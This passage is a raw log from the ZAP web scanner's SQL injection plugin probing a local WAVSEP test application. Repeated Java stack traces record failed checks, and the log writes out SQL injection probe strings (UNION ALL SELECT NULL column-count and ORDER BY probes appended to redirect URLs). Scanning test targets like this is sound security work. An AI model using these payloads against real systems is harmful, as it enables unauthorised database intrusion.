org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681779 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com') UNION ALL SELECT NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com') UNION ALL SELECT NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681779 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') ORDER BY 9444-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') ORDER BY 9444-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9681781 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681781 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com') UNION ALL SELECT NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com') UNION ALL SELECT NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681782 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681783 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681784 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681784 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681785 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681785 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681787 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681787 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681788 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- at 